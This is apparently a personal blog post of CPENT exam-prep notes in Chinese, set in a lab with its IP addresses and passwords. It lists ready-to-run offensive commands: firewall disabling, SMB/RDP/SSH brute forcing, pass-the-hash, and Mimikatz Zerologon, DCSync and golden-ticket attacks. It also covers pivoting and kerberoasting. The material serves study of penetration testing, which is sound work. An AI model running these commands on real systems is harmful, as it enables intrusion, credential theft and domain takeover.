

<!DOCTYPE html>
<html lang="zh-TW" data-default-color-scheme=dark>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/giwawa.jpg">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="Peter Luo">
  <meta name="keywords" content="">
  
    <meta name="description" content="CPENT-考前準備">
<meta property="og:type" content="article">
<meta property="og:title" content="CPENT-考前準備">
<meta property="og:url" content="http://example.com/2021/07/17/CPENT-%E8%80%83%E5%89%8D%E6%BA%96%E5%82%99/index.html">
<meta property="og:site_name" content="Peter Luo Blog">
<meta property="og:description" content="CPENT-考前準備">
<meta property="og:locale" content="zh_TW">
<meta property="og:image" content="http://example.com/img/article/banner/banner-4.jpg">
<meta property="article:published_time" content="2021-07-17T15:43:06.000Z">
<meta property="article:modified_time" content="2023-09-17T15:47:56.360Z">
<meta property="article:author" content="Peter Luo">
<meta property="article:tag" content="CPENT">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://example.com/img/article/banner/banner-4.jpg">
  
  
  
  <title>CPENT-考前準備 - Peter Luo Blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.9.4","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Peter Luo x Giwawa</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                <span>首頁</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                <span>歸檔</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                <span>分類</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                <span>標籤</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                <span>關於</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/bg/bg7.jpg') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="CPENT-考前準備"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2021-07-17 23:43" pubdate>
          2021年7月17日 晚上
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          9.7k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          81 分鐘
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">CPENT-考前準備</h1>
            
            
              <div class="markdown-body">
                
                <h6 id="tags-CPENT"><a href="#tags-CPENT" class="headerlink" title="tags: CPENT"></a>tags: <code>CPENT</code></h6><h1 id="CPENT-考前準備"><a href="#CPENT-考前準備" class="headerlink" title="CPENT 考前準備"></a>CPENT 考前準備</h1><h2 id="ilabs"><a href="#ilabs" class="headerlink" title="ilabs"></a>ilabs</h2><ul>
<li><p>Windows server 2019 </p>
<ul>
<li>192.168.0.20</li>
<li>172.19.19.20</li>
</ul>
</li>
<li><p>Parrot</p>
<ul>
<li>192.168.0.18</li>
<li>172.19.19.18</li>
</ul>
</li>
<li><p>密碼噴灑</p>
<blockquote>
<p>kevin (username)</p>
</blockquote>
<figure class="highlight gams"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs gams">Pa<span class="hljs-symbol">$</span><span class="hljs-symbol">$</span>w0rd123<br>owaspbwa<br></code></pre></td></tr></table></figure></li>
</ul>
<h2 id="Nmap"><a href="#Nmap" class="headerlink" title="Nmap"></a>Nmap</h2><ul>
<li><p><b>ICMP 封包 基礎知識</b></p>
<ul>
<li>訊息型態(message type)<ul>
<li>Type:8 Echo Request（回應要求） #要求對方主機回聲</li>
<li>Type:0 Echo Reply（回應答覆）   #主機回聲答覆</li>
<li>Wireshark接收ICMP封包<br>  <img src="https://i.imgur.com/58fxInL.png" srcset="/img/loading.gif" lazyload></li>
</ul>
</li>
</ul>
</li>
<li><p><b>NMAP 檢測存活主機(KEEP-ALIVE)</b></p>
<ul>
<li>ICMP掃描</li>
<li>nmap -sn 特權模式掃描 <ul>
<li>LAN -&gt; 發送ARP封包</li>
<li>WAN -&gt; 發送TCP SYN-&gt;443port,ACK-&gt;80port 封包 以及icmp requests type8&#x2F;13，若都無reply即判定close  <figure class="highlight vim"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs vim"><span class="hljs-keyword">nmap</span> -<span class="hljs-keyword">sn</span> -n <span class="hljs-symbol">&lt;ip&gt;</span><br></code></pre></td></tr></table></figure></li>
<li>若還是無法找到存活主機，bypass keepalive階段直接進行port掃描  <figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">nmap</span> -Pn -n -p21-<span class="hljs-number">25</span>,<span class="hljs-number">80</span>,<span class="hljs-number">3389</span> &lt;ip&gt; <br></code></pre></td></tr></table></figure></li>
</ul>
</li>
</ul>
</li>
<li><p><b>列舉系統版本</b></p>
<ul>
<li><p>利用smb-os-discovery枚舉系統版本</p>
  <figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs routeros">nmap -Pn -n -p139,445 <span class="hljs-attribute">--script</span>=smb-os-discovery &lt;ip&gt;<br></code></pre></td></tr></table></figure>
<p>  <img src="https://i.imgur.com/8ojliDs.png" srcset="/img/loading.gif" lazyload></p>
</li>
<li><p>利用smb-protocols查詢對方smb可支援協議版本</p>
  <figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs routeros">nmap -Pn -n -p139,445 <span class="hljs-attribute">--script</span>=smb-protocols &lt;ip&gt;<br></code></pre></td></tr></table></figure>
<p>  <img src="https://i.imgur.com/sR7wRkv.png" srcset="/img/loading.gif" lazyload></p>
</li>
</ul>
</li>
<li><p><b>內網腳本掃描</b></p>
<ul>
<li>ping.sh  <figure class="highlight typescript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs typescript">#/bin/bash<br><br>network=<span class="hljs-string">&quot;192.168.50&quot;</span><br><br><span class="hljs-title function_">is_ping</span>(<span class="hljs-params"></span>)&#123;<br><br>ping -c <span class="hljs-number">1</span> -w <span class="hljs-number">1</span> $network.<span class="hljs-property">$i</span> &gt; <span class="hljs-regexp">/dev/</span><span class="hljs-literal">null</span><br>[ $? -eq <span class="hljs-number">0</span> ] &amp;&amp; echo $i is up.<br>&#125;<br><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> $(seq <span class="hljs-number">1</span> <span class="hljs-number">255</span>)<br><span class="hljs-keyword">do</span> <br>is_ping $i<br>done<br></code></pre></td></tr></table></figure></li>
</ul>
</li>
</ul>
<h2 id="內網測試"><a href="#內網測試" class="headerlink" title="內網測試"></a>內網測試</h2><ul>
<li><p><b>Windows網路芳鄰</b></p>
<ul>
<li>UDP 137 -&gt; NETBIOS 名稱解析</li>
<li>UDP 138 -&gt; NETBIOS 服務宣告</li>
<li>TCP 139 -&gt; SMB&#x2F;CIFS (smb為協定，cifs為服務)</li>
</ul>
</li>
<li><p><b>SMB&#x2F;CIFS (TCP 139,445)</b></p>
<ul>
<li>AUTHENTICATION (NTLM V1,V2) (主要作為驗證手段)</li>
<li>File &amp; Print sharing (檔案分享)</li>
<li>IPC (inter-process communication)(remote cmd)</li>
</ul>
</li>
<li><p><b>分散式運算控制Windows</b></p>
<ul>
<li>IPC (SMB)</li>
<li>RPC</li>
<li>WinRM &#x2F;WMI</li>
</ul>
</li>
<li><p><b>SMB VERSION</b></p>
<ul>
<li>v1</li>
<li>v2:support digital signature </li>
<li>v3:support encrypt</li>
</ul>
<p>   <img src="https://i.imgur.com/GJb3eJN.png" srcset="/img/loading.gif" lazyload></p>
</li>
<li><p><b>NetBIOS基礎知識</b></p>
<ul>
<li>NetBIOS 名稱<ul>
<li>Total 16 字元</li>
<li>1-15:電腦名稱</li>
<li>16th:服務代號</li>
</ul>
</li>
<li>nbtstat -n 查看本機netbios註冊資訊<br>  <img src="https://i.imgur.com/vUO9PvL.png" srcset="/img/loading.gif" lazyload></li>
</ul>
</li>
<li><p><b>nbtstat 查詢別台主機netbios資訊</b></p>
<ul>
<li><p>利用IP查詢 (如無法查詢可能為FW阻擋)</p>
  <figure class="highlight armasm"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs armasm"><span class="hljs-symbol">nbtstat</span> -A &lt;<span class="hljs-built_in">ip</span>&gt;<br></code></pre></td></tr></table></figure></li>
<li><p>利用computerName解析IP查詢</p>
  <figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs xml">nbtstat -a <span class="hljs-tag">&lt;<span class="hljs-name">computername</span>&gt;</span><br></code></pre></td></tr></table></figure>
</li>
<li><p>關閉防火牆</p>
  <figure class="highlight pf"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs pf"><span class="hljs-comment">#舊版</span><br>netsh firewall <span class="hljs-built_in">set</span> opmode disable<br><span class="hljs-comment">#新版(win2012/2019)</span><br>netsh advfirewall <span class="hljs-built_in">set</span> allprofiles <span class="hljs-keyword">state</span> off<br></code></pre></td></tr></table></figure></li>
<li><p>IPtables 設為允許</p>
   <figure class="highlight tp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs tp">sudo iptables -S<br>sudo iptables -<span class="hljs-keyword">P</span> INPUT <span class="hljs-keyword">ACC</span>EPT<br>sudo iptables -<span class="hljs-keyword">P</span> OUTPUT <span class="hljs-keyword">ACC</span>EPT<br></code></pre></td></tr></table></figure></li>
</ul>
</li>
<li><p><b>egress busting (Reverse 對外爆破)</b></p>
<ul>
<li>目標NC   <figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">nc</span> -nvz &lt;ip&gt; <span class="hljs-number">1</span>-<span class="hljs-number">1024</span><br></code></pre></td></tr></table></figure></li>
<li>本地監聽  <figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">wireshark</span> OR tcpdump -i eth0 tcp[<span class="hljs-number">13</span>]==<span class="hljs-number">2</span> # SYN<br></code></pre></td></tr></table></figure></li>
</ul>
</li>
<li><p><b>暴力破解</b></p>
<ul>
<li><p>windows smb auth (smb認證爆破)</p>
  <figure class="highlight applescript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs applescript">crackmapexec smb ip -u &lt;username <span class="hljs-keyword">or</span> <span class="hljs-built_in">file</span>&gt; -p &lt;password <span class="hljs-keyword">or</span> <span class="hljs-built_in">file</span>&gt;<br></code></pre></td></tr></table></figure></li>
<li><p>rdp brute (rdp認證爆破)</p>
  <figure class="highlight bnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bnf">crowbar -b rdp -v -U <span class="hljs-attribute">&lt;userfile&gt;</span> -C <span class="hljs-attribute">&lt;passfile&gt;</span> -s <span class="hljs-attribute">&lt;ip/CIDR&gt;</span><br></code></pre></td></tr></table></figure>
</li>
<li><p>hydra ssh (ssh爆破)</p>
  <figure class="highlight crmsh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs crmsh">hydra -l <span class="hljs-keyword">user</span> <span class="hljs-title">-P</span> passfile ssh ip -F -V<br></code></pre></td></tr></table></figure>
</li>
<li><p>linux 執行windows cmd</p>
  <figure class="highlight 1c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs 1c">winexe -U &#x27;administrator%Pa$$w0rd&#x27; <span class="hljs-comment">//&lt;ip&gt; cmd.exe</span><br>pth-winexe -U &#x27;administrator%<span class="hljs-number">92937945</span>B<span class="hljs-number">51881434</span>1DE3F<span class="hljs-number">726500</span>D4FF:<span class="hljs-number">92937945</span>B<span class="hljs-number">51881434</span>1DE3F<span class="hljs-number">726500</span>D4FF&#x27; <span class="hljs-comment">//&lt;ip&gt; cmd.exe</span><br></code></pre></td></tr></table></figure></li>
</ul>
</li>
<li><p><b>RDP連線相關</b></p>
<ul>
<li><p>rdesktop(停更)</p>
</li>
<li><p>xfreerdp (版本須為2.3.0)</p>
  <figure class="highlight vim"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs vim">lib <span class="hljs-keyword">so</span> 檢查<br>sudo dpkg -<span class="hljs-keyword">l</span> |<span class="hljs-keyword">grep</span> freerdp<br></code></pre></td></tr></table></figure></li>
<li><p>xfreerdp 連線</p>
  <figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">xfreerdp /v:172.19.19.20 /u:administrator /p:<span class="hljs-string">&#x27;Pa$$w0rd&#x27;</span> /size:90%<br></code></pre></td></tr></table></figure>
</li>
<li><p>開啟rdp</p>
  <figure class="highlight dockerfile"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs dockerfile">reg <span class="hljs-keyword">add</span><span class="language-bash"> <span class="hljs-string">&quot;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server&quot;</span> /v fDenyTSConnections /t REG_DWORD /d 0 /f</span><br></code></pre></td></tr></table></figure></li>
</ul>
</li>
<li><p><b>Pivot 跳板</b></p>
<ul>
<li><p>SSH port forwarding (SSH tunneling)</p>
<ul>
<li><p>Local</p>
<ul>
<li>ssh server(70) target(24)  <figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">ssh</span> -nNTL *:<span class="hljs-number">80</span>:<span class="hljs-number">172.19.19.24:80</span> administrator@<span class="hljs-number">172.19.19.70</span><br></code></pre></td></tr></table></figure>
  <img src="https://i.imgur.com/kOmzS3I.png" srcset="/img/loading.gif" lazyload></li>
</ul>
</li>
<li><p>Remote</p>
<ul>
<li>nano &#x2F;etc&#x2F;ssh&#x2F;sshd_config <add GatewayPorts yes>  <figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">ssh</span> -R *:<span class="hljs-number">8008</span>:<span class="hljs-number">172.19.19.24:80</span> administrator@<span class="hljs-number">172.19.19.70</span><br></code></pre></td></tr></table></figure>
  <img src="https://i.imgur.com/AJ4VstX.png" srcset="/img/loading.gif" lazyload></li>
</ul>
</li>
<li><p>Dynamic (proxychain)</p>
<ul>
<li>nano &#x2F;etc&#x2F;proxychains.conf  <figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">ssh</span> -nNTCD <span class="hljs-number">9050</span> administrator@<span class="hljs-number">172.19.19.70</span><br></code></pre></td></tr></table></figure>
  <img src="https://i.imgur.com/ZK86vG5.png" srcset="/img/loading.gif" lazyload></li>
</ul>
</li>
</ul>
</li>
<li><p>Port forwarding</p>
<ul>
<li>socat (full function,fat,support udp)<ul>
<li>socat tcp-listen:80,fork tcp:<ip>:80</li>
<li>socat udp-recvfrom:161,fork udp-sendto:<ip>:161</li>
</ul>
</li>
<li>datapipe   <figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs awk">https:<span class="hljs-regexp">//</span>raw.githubusercontent.com<span class="hljs-regexp">/bovine/</span>datapipe<span class="hljs-regexp">/master/</span>datapipe.c<br><span class="hljs-comment">#程式第80行需修改</span><br><span class="hljs-comment">#define MAXCLIENTS 20 改為 999</span><br></code></pre></td></tr></table></figure>
<ul>
<li>datapipe 0.0.0.0 135 <target> 135</li>
<li>datapipe 0.0.0.0 445 <target> 445</li>
<li>datapipe 0.0.0.0 4444 <parrot> 4444</li>
<li>gcc datapipe.c -o datapipe</li>
</ul>
</li>
<li>portproxy (windows netsh built-in)<ul>
<li>netsh interface portproxy add v4tov4 80 <ip> 80</li>
<li>netsh interface portproxy show v4tov4</li>
</ul>
</li>
</ul>
</li>
<li><p>meterpreter</p>
<ul>
<li>msf only</li>
<li>session routing</li>
<li>also support port forwarding</li>
</ul>
</li>
</ul>
</li>
</ul>
<h2 id="IOT分析"><a href="#IOT分析" class="headerlink" title="IOT分析"></a>IOT分析</h2><ul>
<li><p>練習用</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs awk">https:<span class="hljs-regexp">//gi</span>thub.com<span class="hljs-regexp">/Apress/i</span>ot-hack-hdbk-practical-guide<br>https:<span class="hljs-regexp">//</span>kb.netgear.com<span class="hljs-regexp">/26889/</span>D6000-Firmware-Version-<span class="hljs-number">1</span>-<span class="hljs-number">0</span>-<span class="hljs-number">0</span>-<span class="hljs-number">41</span> <br></code></pre></td></tr></table></figure>
</li>
<li><p>binwalk no such file sasquatch(error)</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">https:<span class="hljs-regexp">//gi</span>thub.com<span class="hljs-regexp">/useidel/</span>sasquatch (gcc10 compile success)<br></code></pre></td></tr></table></figure></li>
<li><p>binwalk 韌體分析</p>
<figure class="highlight mipsasm"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs mipsasm"><span class="hljs-keyword">binwalk </span>firewarm.<span class="hljs-keyword">bin</span><br></code></pre></td></tr></table></figure>
</li>
<li><p>binwalk 提取檔案系統</p>
<figure class="highlight mipsasm"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs mipsasm"><span class="hljs-keyword">binwalk </span>-e firewam.<span class="hljs-keyword">bin</span><br></code></pre></td></tr></table></figure>
</li>
<li><p>find &amp;&amp; grep 查找</p>
<figure class="highlight gradle"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs gradle"><span class="hljs-keyword">find</span> <span class="hljs-regexp">/ -name *passwd* -print 2&gt;/</span>dev/<span class="hljs-keyword">null</span><br><span class="hljs-keyword">grep</span> -nir passwd <br></code></pre></td></tr></table></figure></li>
<li><p>squashFS 介紹</p>
</li>
</ul>
<blockquote>
<p>Squashfs（.sfs）是一套供Linux核心使用的GPL開源只讀壓縮檔案系統。Squashfs能夠為檔案系統內的檔案、inode及目錄結構進行壓縮，並支援最大1024千位元組的區段，以提供更大的壓縮比。<br>Squashfs常被用於各Linux發行版的LiveCD中，也用於OpenWrt 和DD-WRT 的路由器韌體。Chromecast也是該檔案系統的使用者。</p>
</blockquote>
<ul>
<li>hexdump 取出總數最多(xor)<figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs pgsql">hexdump -v -C <span class="hljs-keyword">encrypted</span>.bin | cut -d &quot; &quot; -f <span class="hljs-number">3</span><span class="hljs-number">-20</span> |sort |uniq -c <br></code></pre></td></tr></table></figure></li>
</ul>
<h2 id="Active-Directory"><a href="#Active-Directory" class="headerlink" title="Active Directory"></a>Active Directory</h2><blockquote>
<p>Kerberos是一種由MIT（麻省理工大學）提出的一種網路身份驗證協議。它旨在通過使用金鑰加密技術為客戶端&#x2F;伺服器應用程式提供強身份驗證。</p>
</blockquote>
<blockquote>
<p>認證伺服器（Authentication Server，簡稱 AS）<br>票證授權票證（Ticket Granting Ticket，簡稱 TGT）<br>金鑰分發中心（Key Distribution Center，簡稱KDC）<br>TGS（Ticket Granting Server）&#x3D; 票據授權伺服器<br>SS（Service Server）&#x3D; 特定服務提供端</p>
</blockquote>
<ul>
<li><p><b>kerberos 概述及通信過程</b></p>
<ul>
<li>ASREQ: Client向KDC發起ASREQ,請求憑據是Client hash加密的時間戳</li>
<li>ASREP: KDC使用Client hash進行解密，如果結果正確就返回用krbtgt hash加密的TGT票據，TGT裏面包含PAC,PAC包含Client的sid，Client所在的組。 </li>
<li>TGSREQ: Client憑藉TGT票據向KDC發起針對特定服務的TGSREQ請求 </li>
<li>TGS_REP: KDC使用krbtgt hash進行解密，如果結果正確，就返回用服務hash 加密的TGS票據(這一步不管使用者有沒有訪問服務的許可權，只要TGT正確，就返回TGS票據) </li>
<li>AP_REQ: Client拿著TGS票據去請求服務 </li>
<li>AP_REP: 服務使用自己的hash解密TGS票據。如果解密正確，就拿著PAC去KDC那邊問Client有沒有訪問許可權，域控解密PAC。獲取Client的sid，以及所在的組，再根據該服務的ACL，判斷Client是否有訪問服務的許可權。<br><img src="https://i.imgur.com/11M0gNF.png" srcset="/img/loading.gif" lazyload></li>
</ul>
</li>
<li><p><b>kerberoasting</b></p>
<ul>
<li>DC 創建SPN<ul>
<li>setspn -s http&#x2F;lpt.com user-one (靶機環境)</li>
</ul>
</li>
<li>Parrot SPN scan brute<ul>
<li>python3 -m pip install impacket –upgrade</li>
<li>GetUserSPNs.py ‘lpt.com&#x2F;cpent:Pa$$w0rd’ -dc-ip 192.168.177.19 -request -outputfile kerberos.txt</li>
<li>john kerberos.txt –show</li>
</ul>
</li>
</ul>
</li>
<li><p><b>Zerologon</b></p>
<ul>
<li>mimikatz <ul>
<li>清空DC認證密碼  <figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash">lsadump::zerologon  /target:域控IP  /account:域控主機名$  /exploit<br>lsadump::zerologon /target:server2019 /account:server2019 /null /ntlm /exploit<br></code></pre></td></tr></table></figure></li>
<li>dcsync 獲取目標雜湊(krbtgt)  <figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">lsadump::dcsync /domain:lpt.com /dc:server2019 /authuser:administrator /authdomain:lpt.com /authpassword:Pa$<span class="hljs-variable">$w0rd</span> /user:krbtgt /authntlm<br></code></pre></td></tr></table></figure></li>
<li>Golden Ticket   <figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs bash">注入內存前必須開啟權限<br>privilege::debug<br>kerberos::golden /domain:lpt.com /sid:&lt;sid&gt; /krbtgt:&lt;<span class="hljs-built_in">hash</span>&gt; /user:evil /ticket:evil.tck /ptt<br></code></pre></td></tr></table></figure></li>
<li>pth  <figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">sekurlsa::pth /user:administrator /domain:lpt.com /ntlm:&lt;<span class="hljs-built_in">hash</span>&gt;<br></code></pre></td></tr></table></figure></li>
</ul>
</li>
<li>PowerView.ps1  <figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><code class="hljs pgsql">https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1<br>powershell -&gt; 物件導向 <br><br>cmd -&gt; powershell -nop -ep bypass  ###Bypass <span class="hljs-keyword">Policy</span><br><span class="hljs-keyword">Import</span>-Module .\powerview.ps1<br><br><span class="hljs-keyword">Get</span>-Forest  ### <span class="hljs-keyword">Domain</span> -&gt; Tree -&gt; Forest<br><span class="hljs-keyword">Get</span>-DomainComputer |<span class="hljs-keyword">select</span> -Property <span class="hljs-type">name</span>,dnshostname<br><span class="hljs-keyword">Get</span>-DomainUser | <span class="hljs-keyword">select</span> -Property <span class="hljs-type">name</span>,givenname<br><br>查看共享資料夾<br>net <span class="hljs-keyword">share</span><br>查看遠端共享資料夾<br>net <span class="hljs-keyword">view</span> \\server2019\\<br>dir \\server2019\users<br>```    <br>- 參考資料<br><br></code></pre></td></tr></table></figure>
  透過ssh ptT(pass the ticket)<br>  <a target="_blank" rel="noopener" href="https://zhuanlan.zhihu.com/p/27242393">https://zhuanlan.zhihu.com/p/27242393</a></li>
</ul>
